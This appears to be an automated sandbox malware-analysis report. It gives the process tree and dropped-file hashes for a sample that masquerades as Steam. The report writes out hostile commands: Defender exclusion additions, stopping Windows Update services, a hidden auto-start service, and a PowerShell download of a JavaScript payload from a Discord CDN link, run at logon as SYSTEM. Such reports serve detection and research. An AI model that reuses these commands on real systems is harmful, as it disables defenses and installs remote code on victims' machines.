C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl1.exe"C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl1.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl2.exe"C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl2.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AAWUFTXN"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl3.exe"C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl3.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\45A4.tmp\45A5.tmp\45A6.bat C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl3.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 8279D1E0935608D8FE6B50246BE393592⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding D8D988B79F2BC827E64C3F7C2C98A004 E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9EFD4B53F1CFC81F1548D9F6F540BE652⤵
- Loads dropped DLL
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 2248 -ip 22482⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\e57d082.rbsFilesize
823KB
MD5729cf82ddae8700868daf712d6780890
SHA11ca459ce817ee06b40f52824e59e4b60cd837227
SHA256de7d21e2212cfa3c282314a1446771f7356e3d525907117a19c4144b17781335
SHA5126de67c2bfe0c39ba29af2dec3056b811621a18516621f7a45e2599bc2bba3b89fea4d8484875a6003485a02268eec08920956fabce412ad0e66d30ab5b05aa7f
-
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\LICENSEFilesize
11KB
MD5dfc1b916d4555a69859202f8bd8ad40c
SHA1fc22b6ee39814d22e77fe6386c883a58ecac6465
SHA2567b0ce3425a26fdba501cb13508af096ade77e4036dd2bd8849031ddecf64f7c9
SHA5121fbe6bb1f60c8932e4dcb927fc8c8131b9c73afd824ecbabc2045e7af07b35a4155a0f8ad3103bf25f192b6d59282bfc927aead3cb7aaeb954e1b6dbd68369fa
-
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.jsFilesize
79B
MD524563705cc4bb54fccd88e52bc96c711
SHA1871fa42907b821246de04785a532297500372fc7
SHA256ef1f170ad28f2d870a474d2f96ae353d770fff5f20e642cd8f9b6f1d7742df13
SHA5122ce8d2cf580623358fef5f4f8925d0c9943a657c2503c80048ca789bf16eacdb980bfc8aaaa50101a738e939926fcf2545500484dcad782c700ee206d8c6f9b9
-
C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSEFilesize
754B
MD5d2cf52aa43e18fdc87562d4c1303f46a
SHA158fb4a65fffb438630351e7cafd322579817e5e1
SHA25645e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0
SHA51254e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16
-
C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\licenseFilesize
1KB
MD5b862aeb7e1d01452e0f07403591e5a55
SHA1b8765be74fea9525d978661759be8c11bab5e60e
SHA256fcf1a18be2e25ba82acf2c59821b030d8ee764e4e201db6ef3c51900d385515f
SHA512885369fe9b8cb0af1107ee92b52c6a353da7cf75bc86abb622e2b637c81e9c5ffe36b0ac74e11cfb66a7a126b606fe7a27e91f3f4338954c847ed2280af76a5f
-
C:\Program Files\nodejs\node_modules\npm\node_modules\env-paths\licenseFilesize
1KB
MD55ad87d95c13094fa67f25442ff521efd
SHA101f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA25667292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA5127187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3
-
C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\LICENSE.mdFilesize
818B
MD52916d8b51a5cc0a350d64389bc07aef6
SHA1c9d5ac416c1dd7945651bee712dbed4d158d09e1
SHA256733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04
SHA512508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74
-
C:\Program Files\nodejs\node_modules\npm\node_modules\ignore-walk\LICENSEFilesize
780B
MD5b020de8f88eacc104c21d6e6cacc636d
SHA120b35e641e3a5ea25f012e13d69fab37e3d68d6b
SHA2563f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706
SHA5124220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38
-
C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\LICENSEFilesize
730B
MD5072ac9ab0c4667f8f876becedfe10ee0
SHA10227492dcdc7fb8de1d14f9d3421c333230cf8fe
SHA2562ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013
SHA512f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSEFilesize
802B
MD5d7c8fab641cd22d2cd30d2999cc77040
SHA1d293601583b1454ad5415260e4378217d569538e
SHA25604400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be
SHA512278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.jsFilesize
16KB
MD5bc0c0eeede037aa152345ab1f9774e92
SHA156e0f71900f0ef8294e46757ec14c0c11ed31d4e
SHA2567a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5
SHA5125f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\package.jsonFilesize
1KB
MD5d116a360376e31950428ed26eae9ffd4
SHA1192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b
SHA256c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5
